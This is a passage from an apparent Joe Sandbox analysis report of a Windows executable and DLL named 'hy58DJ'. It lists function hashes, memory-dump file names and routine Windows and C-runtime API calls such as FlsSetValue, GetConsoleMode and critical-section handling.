                                      • Opcode ID: 50c4e1713d184cdf0fe8662c588dfc2dc4bd464af84c2e8e24b447969137b9d6
                                      • Instruction ID: 30b8f428ad32e97437914079330796316ee792419181a9eafc2250ec0a580082
                                      • Opcode Fuzzy Hash: 50c4e1713d184cdf0fe8662c588dfc2dc4bd464af84c2e8e24b447969137b9d6
                                      • Instruction Fuzzy Hash: 56B1B2A1F0AE9281EA65EF53D44417863A2AF54FE4F1984F7DE4D0B7A6DE3CE4618300
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2685253644.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2685233815.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685276367.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685296160.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685314518.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: FileInfoSleepStartupType
                                      • String ID:
                                      • API String ID: 1527402494-0
                                      • Opcode ID: b08a78d08636f6435b28fe3dd3a9dc7fe07bd3625b9b0f375563a7ba95a95139
                                      • Instruction ID: 2708af0267d8365e54dad009941ca9060f987db411f69ca3ecc20d856229d7df
                                      • Opcode Fuzzy Hash: b08a78d08636f6435b28fe3dd3a9dc7fe07bd3625b9b0f375563a7ba95a95139
                                      • Instruction Fuzzy Hash: 68917DB260468085E726CB2AE8487D936E4A71A7F4F554726EB79473F1DA7EC841C301
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2685253644.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2685233815.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685276367.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685296160.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685314518.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: CommandLine$ByteCharErrorLastMultiWide
                                      • String ID:
                                      • API String ID: 3078728599-0
                                      • Opcode ID: ef26d27679934e8a1eb9f7884d3deda4952e844cae744d2e9e47d116f2e36b92
                                      • Instruction ID: cab5f27f5268d67fa2b955b7a4895f7bd1e416bc4c6d53bc856f5ac88b27d897
                                      • Opcode Fuzzy Hash: ef26d27679934e8a1eb9f7884d3deda4952e844cae744d2e9e47d116f2e36b92
                                      • Instruction Fuzzy Hash: 04316D72614A8082EB21DF52F80479A77E1F78EBD0F540225FB9A87BB5DB3DC9458B00
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2685253644.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2685233815.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685276367.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685296160.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685314518.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: Console$Write$ByteCharCreateErrorFileLastMultiOutputWide
                                      • String ID:
                                      • API String ID: 1850339568-0
                                      • Opcode ID: 4201eac49788cf302f684002ef01a2526af238478ded1ce40358f727cda20400
                                      • Instruction ID: bea3f08d648c3b04eb316e4c6042deaac10e1fdf59f4257f2eabc448b4c653dc
                                      • Opcode Fuzzy Hash: 4201eac49788cf302f684002ef01a2526af238478ded1ce40358f727cda20400
                                      • Instruction Fuzzy Hash: 38317AB1214A4482EB12CF22F8403AA73A1F79D7E4F544315FB6A4BAF5DB7AC5859B00
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2685351159.00007FFE1A451000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A450000, based on PE: true
                                      • Associated: 00000005.00000002.2685334284.00007FFE1A450000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2685375588.00007FFE1A462000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2685394904.00007FFE1A46D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2685412364.00007FFE1A46F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ffe1a450000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: _set_statfp
                                      • String ID:
                                      • API String ID: 1156100317-0
                                      • Opcode ID: 4d3c2bc84a878a3ff3d229176cc4d467c3c986fbb6f3ea169b2dd3d189eb8c82
                                      • Instruction ID: a15746ba4ae31648ba5e055a314ff2ca22869398925bc56656ff472062e28ce0
                                      • Opcode Fuzzy Hash: 4d3c2bc84a878a3ff3d229176cc4d467c3c986fbb6f3ea169b2dd3d189eb8c82
                                      • Instruction Fuzzy Hash: 0111E7F2F1CE0B91F754212AE56637910516F98BB1F584AF6E5BF472FECE2CA8604102
                                      APIs
                                      • FlsGetValue.KERNEL32(?,?,?,00007FFE1A45766F,?,?,00000000,00007FFE1A45790A,?,?,?,?,?,00007FFE1A457896), ref: 00007FFE1A4596A3
                                      • FlsSetValue.KERNEL32(?,?,?,00007FFE1A45766F,?,?,00000000,00007FFE1A45790A,?,?,?,?,?,00007FFE1A457896), ref: 00007FFE1A4596C2
                                      • FlsSetValue.KERNEL32(?,?,?,00007FFE1A45766F,?,?,00000000,00007FFE1A45790A,?,?,?,?,?,00007FFE1A457896), ref: 00007FFE1A4596EA
                                      • FlsSetValue.KERNEL32(?,?,?,00007FFE1A45766F,?,?,00000000,00007FFE1A45790A,?,?,?,?,?,00007FFE1A457896), ref: 00007FFE1A4596FB
                                      • FlsSetValue.KERNEL32(?,?,?,00007FFE1A45766F,?,?,00000000,00007FFE1A45790A,?,?,?,?,?,00007FFE1A457896), ref: 00007FFE1A45970C
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2685351159.00007FFE1A451000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A450000, based on PE: true
                                      • Associated: 00000005.00000002.2685334284.00007FFE1A450000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2685375588.00007FFE1A462000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2685394904.00007FFE1A46D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2685412364.00007FFE1A46F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ffe1a450000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: Value
                                      • String ID:
                                      • API String ID: 3702945584-0
                                      • Opcode ID: bb51f29ac47eeb1f6796421cb9a02d5f68bea7befc5ae5f024f95b6d7c89f858
                                      • Instruction ID: 4fe382b8783b73bb7434e40ccaeab3ca34bf4607263bfa80be17a0ecfcb738b0
                                      • Opcode Fuzzy Hash: bb51f29ac47eeb1f6796421cb9a02d5f68bea7befc5ae5f024f95b6d7c89f858
                                      • Instruction Fuzzy Hash: 2D119DA4B0CE424AFA587727655117921525F41BF0F4843F7E83D866F6EE6CE8628600
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2685351159.00007FFE1A451000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A450000, based on PE: true
                                      • Associated: 00000005.00000002.2685334284.00007FFE1A450000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2685375588.00007FFE1A462000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2685394904.00007FFE1A46D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2685412364.00007FFE1A46F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ffe1a450000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: Value
                                      • String ID:
                                      • API String ID: 3702945584-0
                                      • Opcode ID: 268c2f24943cee61b6b4fcee88cdb8167fba3483a6ba8794c8981ad7437e3c9d
                                      • Instruction ID: 9886265ae868ef42c8ec8824189c8b1e5a49691e56d045c777dc5de58d6d0cf0
                                      • Opcode Fuzzy Hash: 268c2f24943cee61b6b4fcee88cdb8167fba3483a6ba8794c8981ad7437e3c9d
                                      • Instruction Fuzzy Hash: 0A111C95F0DE4B4AFA697633545117921524F45B70F5807F6D43E4A2F3EE6CF8728600
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2685351159.00007FFE1A451000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A450000, based on PE: true
                                      • Associated: 00000005.00000002.2685334284.00007FFE1A450000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2685375588.00007FFE1A462000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2685394904.00007FFE1A46D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2685412364.00007FFE1A46F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ffe1a450000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: CallEncodePointerTranslator
                                      • String ID: MOC$RCC
                                      • API String ID: 3544855599-2084237596
                                      • Opcode ID: 05e6bcd6379202f9de8a504331af606c6f0c7846a7ada8f8d1f8410d364d1b1d
                                      • Instruction ID: 1fda7bcd80838d79f47f4ebbcf37e6f1938ad215e33e9cbd6e7a0c06836dbf00
                                      • Opcode Fuzzy Hash: 05e6bcd6379202f9de8a504331af606c6f0c7846a7ada8f8d1f8410d364d1b1d
                                      • Instruction Fuzzy Hash: 4791D4B3B18B858AE710EB76E4402BD77A0FB44B98F1041B6EA4D57765DF38E1A5C700
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2685351159.00007FFE1A451000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A450000, based on PE: true
                                      • Associated: 00000005.00000002.2685334284.00007FFE1A450000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2685375588.00007FFE1A462000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2685394904.00007FFE1A46D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2685412364.00007FFE1A46F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ffe1a450000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                      • String ID: csm
                                      • API String ID: 2395640692-1018135373
                                      • Opcode ID: 600c049ef3683cbbf08a5c5522dfbe353e9582842af90703f029184ead156da5
                                      • Instruction ID: 0b72ad1dfcd43df6b06e0e45eda701188761120246ec266cd96c258a6097e636
                                      • Opcode Fuzzy Hash: 600c049ef3683cbbf08a5c5522dfbe353e9582842af90703f029184ead156da5
                                      • Instruction Fuzzy Hash: 3D51D272B19A028ADB14EB17D464A3C7391EB40FA8F0081B2DA4E477A9DF7DF861C700
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2685351159.00007FFE1A451000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A450000, based on PE: true
                                      • Associated: 00000005.00000002.2685334284.00007FFE1A450000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2685375588.00007FFE1A462000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2685394904.00007FFE1A46D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2685412364.00007FFE1A46F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ffe1a450000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: CallEncodePointerTranslator
                                      • String ID: MOC$RCC
                                      • API String ID: 3544855599-2084237596
                                      • Opcode ID: 5cda7244b452661d0672782f382aa0b3873e73ebf845244b9e3a73cca65a7280
                                      • Instruction ID: 2fc3c337b345c0425270369a893f84b00d0e766074bbc67a880e113216940e3d
                                      • Opcode Fuzzy Hash: 5cda7244b452661d0672782f382aa0b3873e73ebf845244b9e3a73cca65a7280
                                      • Instruction Fuzzy Hash: 7161A472A08BC581D760DB26E4403B9B7A0FB85B94F1442A6EB9C47B65CF7CE1A0CB41
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2685351159.00007FFE1A451000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A450000, based on PE: true
                                      • Associated: 00000005.00000002.2685334284.00007FFE1A450000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2685375588.00007FFE1A462000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2685394904.00007FFE1A46D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2685412364.00007FFE1A46F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ffe1a450000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                      • String ID: csm$csm
                                      • API String ID: 3896166516-3733052814
                                      • Opcode ID: e758ec8c21499b3e432f6d95c1f73bf76a1a56d3c0875a2448db4a431929008f
                                      • Instruction ID: 763ff6d62f43d81cb88977c55209de90d52878c189555e7f24c94ff73d6e51dc
                                      • Opcode Fuzzy Hash: e758ec8c21499b3e432f6d95c1f73bf76a1a56d3c0875a2448db4a431929008f
                                      • Instruction Fuzzy Hash: 805195B2708B4286DB649B23944437877A0EB54FA5F1441F7DA4D87BA5CF7CE860C742
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2685253644.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2685233815.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685276367.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685296160.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685314518.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: AddressHandleLoadModuleProc
                                      • String ID: InitializeCriticalSectionAndSpinCount$kernel32.dll
                                      • API String ID: 3055805555-3733552308
                                      • Opcode ID: 8c1e87d42adfe8e60614ff850b90a208d486e410194b6671aa5990fefe8541df
                                      • Instruction ID: 601bfb796087d826a15eddab62e6da73c6b3e4e45b37998f9684764b2688f2d2
                                      • Opcode Fuzzy Hash: 8c1e87d42adfe8e60614ff850b90a208d486e410194b6671aa5990fefe8541df
                                      • Instruction Fuzzy Hash: 5C2136B1614B8582EB66DB23F8407DAA3A5B79C7C0F880526BB49577B5EF78C500C700
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2685253644.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2685233815.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685276367.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685296160.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685314518.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: Process$CurrentSizeWorking
                                      • String ID: Shrinking process size
                                      • API String ID: 2122760700-652428428
                                      • Opcode ID: 928bd44cec0a58dd036a38053952d90c466f8539e57cdcef56d3cedc878990dc
                                      • Instruction ID: de407452bcc55573093b25e37d4a5c8190b9a80636e05c4b95c6e58ff86151e7
                                      • Opcode Fuzzy Hash: 928bd44cec0a58dd036a38053952d90c466f8539e57cdcef56d3cedc878990dc
                                      • Instruction Fuzzy Hash: 74E0C9B4601A4191EA029F57A8A03D41260A74CBF0F815721AA290B2F0CE3985858310
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2685253644.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2685233815.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685276367.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685296160.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685314518.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: CriticalSection$Enter$Leave
                                      • String ID:
                                      • API String ID: 2801635615-0
                                      • Opcode ID: 5d43bde81a4cf71b6d13cac54dc418821bc3305084b6f84d33dc9cdc1ff96344
                                      • Instruction ID: acd2e58e1a3fd81a861280768b65888603737fa84cc19007189881c9ae716cb0
                                      • Opcode Fuzzy Hash: 5d43bde81a4cf71b6d13cac54dc418821bc3305084b6f84d33dc9cdc1ff96344
                                      • Instruction Fuzzy Hash: D331137A225A4082EB128F1AF8407D57364F79DBF5F480221FF6A4B7B4DB3AC8858744
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2685351159.00007FFE1A451000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A450000, based on PE: true
                                      • Associated: 00000005.00000002.2685334284.00007FFE1A450000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2685375588.00007FFE1A462000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2685394904.00007FFE1A46D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2685412364.00007FFE1A46F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ffe1a450000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: FileWrite$ConsoleErrorLastOutput
                                      • String ID:
                                      • API String ID: 2718003287-0
                                      • Opcode ID: 0c7799b21e1c94aa1fd225f6b85a6c051f6d6fdfc663a61abe1d9cd11d154d48
                                      • Instruction ID: a360ebb55c930a1e936b38b2a618167985a4e89b773d19c659308782301eafb2
                                      • Opcode Fuzzy Hash: 0c7799b21e1c94aa1fd225f6b85a6c051f6d6fdfc663a61abe1d9cd11d154d48
                                      • Instruction Fuzzy Hash: BDD1D4B2B08A8189E721DF76D4401FC37B1FB44BA8B5482B6DE5D57BA5DE38D426C340
                                      APIs
                                      • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00007FFE1A45ED07), ref: 00007FFE1A45EE38
                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00007FFE1A45ED07), ref: 00007FFE1A45EEC3
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2685351159.00007FFE1A451000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A450000, based on PE: true
                                      • Associated: 00000005.00000002.2685334284.00007FFE1A450000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2685375588.00007FFE1A462000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2685394904.00007FFE1A46D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2685412364.00007FFE1A46F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ffe1a450000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: ConsoleErrorLastMode
                                      • String ID:
                                      • API String ID: 953036326-0
                                      • Opcode ID: 011e2ebe13567d8ad8ddad1d699b44402174a3121c3ef3043a650edb943c864e
                                      • Instruction ID: 38e0b278cb107df61671f87607734e53cbb8efa8c71b30d6fdfd83ef425d7be1
                                      • Opcode Fuzzy Hash: 011e2ebe13567d8ad8ddad1d699b44402174a3121c3ef3043a650edb943c864e
                                      • Instruction Fuzzy Hash: FA91C5E2F18E5295F760AF67944127C2BA0AB04FA8F1481FADE0E576A5DF38D456C700
                                      APIs
                                      • EnterCriticalSection.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 0000000140004774
                                      • ResetEvent.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 0000000140004870
                                      • SetEvent.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 000000014000487D
                                      • LeaveCriticalSection.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 000000014000488A
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2685253644.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2685233815.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685276367.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685296160.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685314518.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: CriticalEventSection$EnterLeaveReset
                                      • String ID:
                                      • API String ID: 3553466030-0
                                      • Opcode ID: c0905a8df1c3b6d7d2917c1fcaa4435d9a1a27abfa891a899b8a9d6119ba031b
                                      • Instruction ID: 8df361fa7c869b6ec715234f9c2df2ced8c6baf833446e4218a9444c3b5dacad
                                      • Opcode Fuzzy Hash: c0905a8df1c3b6d7d2917c1fcaa4435d9a1a27abfa891a899b8a9d6119ba031b
                                      • Instruction Fuzzy Hash: 0F31D1B5614F4881EB42CB57F8803D463A6B79CBD4F984516EB0E8B372EF3AC4958304
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2685253644.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2685233815.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685276367.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685296160.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685314518.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: CriticalEventSection$EnterLeaveReset
                                      • String ID:
                                      • API String ID: 3553466030-0
                                      • Opcode ID: 6e550663b123c7b4300ff756dd79b72a11867f34fdb7ecd18ec55ee4b4ab60ba
                                      • Instruction ID: 80aeca48758360c6ba791d23c15ba34d7cc547f8c7a26c6fbcbbb07f4ec0a80e
                                      • Opcode Fuzzy Hash: 6e550663b123c7b4300ff756dd79b72a11867f34fdb7ecd18ec55ee4b4ab60ba
                                      • Instruction Fuzzy Hash: 6F3127B2220A8483D761DF27F48439AB3A0F798BD4F000116EB8A47BB5DF39E491C344
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2685351159.00007FFE1A451000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A450000, based on PE: true
                                      • Associated: 00000005.00000002.2685334284.00007FFE1A450000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2685375588.00007FFE1A462000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2685394904.00007FFE1A46D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2685412364.00007FFE1A46F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ffe1a450000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                      • String ID:
                                      • API String ID: 2933794660-0
                                      • Opcode ID: 540efdc4acb7237d38814a0210c5b4881e051432956c40de0382b68ade111df8
                                      • Instruction ID: ad0c0a8387fb56fb21a65fbe740be0724a05915c497d0bdea986d2517391e69a
                                      • Opcode Fuzzy Hash: 540efdc4acb7237d38814a0210c5b4881e051432956c40de0382b68ade111df8
                                      • Instruction Fuzzy Hash: C4114F22B18F019AEB008F61E8442B833B4F718B68F040D72DA6D477A4DF78D1A8C340
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2685253644.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000005.00000002.2685233815.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685276367.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685296160.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000005.00000002.2685314518.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_140000000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: CreateEvent$CriticalInitializeSection
                                      • String ID:
                                      • API String ID: 926662266-0
                                      • Opcode ID: 6e7557a2c0ebfea515044b23bc829654ad5a6134d5329468471647cedafa6715
                                      • Instruction ID: 312f8d8d13b8a868d26f937b45fb8075aed367f1a83d8c92d196673213f535ba
                                      • Opcode Fuzzy Hash: 6e7557a2c0ebfea515044b23bc829654ad5a6134d5329468471647cedafa6715
                                      • Instruction Fuzzy Hash: 8F015A31610F0582E726DFA2B855BCA37E2F75D385F854529FA4A8B630EF3A8145C700
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2685351159.00007FFE1A451000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A450000, based on PE: true
                                      • Associated: 00000005.00000002.2685334284.00007FFE1A450000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2685375588.00007FFE1A462000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2685394904.00007FFE1A46D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2685412364.00007FFE1A46F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ffe1a450000_hy58DJ.jbxd
                                      Similarity
                                      • API ID: __except_validate_context_record
                                      • String ID: csm$csm
                                      • API String ID: 1467352782-3733052814
                                      • Opcode ID: 7b854735182fbbf9032f6bb379489979c6e7540e10eb2e5c3fda445f13d9ec39
                                      • Instruction ID: 7bf9de9c90fc6a82b242d7af03eaa21ad1e220836c9ccc936a02484a7aaffc9c
                                      • Opcode Fuzzy Hash: 7b854735182fbbf9032f6bb379489979c6e7540e10eb2e5c3fda445f13d9ec39
                                      • Instruction Fuzzy Hash: D271A3B2708A8186D761AF27944477D7BA0FB05FA4F0481B6DE4C87AA5CB3CE461C781
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2685351159.00007FFE1A451000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A450000, based on PE: true
                                      • Associated: 00000005.00000002.2685334284.00007FFE1A450000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2685375588.00007FFE1A462000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2685394904.00007FFE1A46D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000005.00000002.2685412364.00007FFE1A46F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
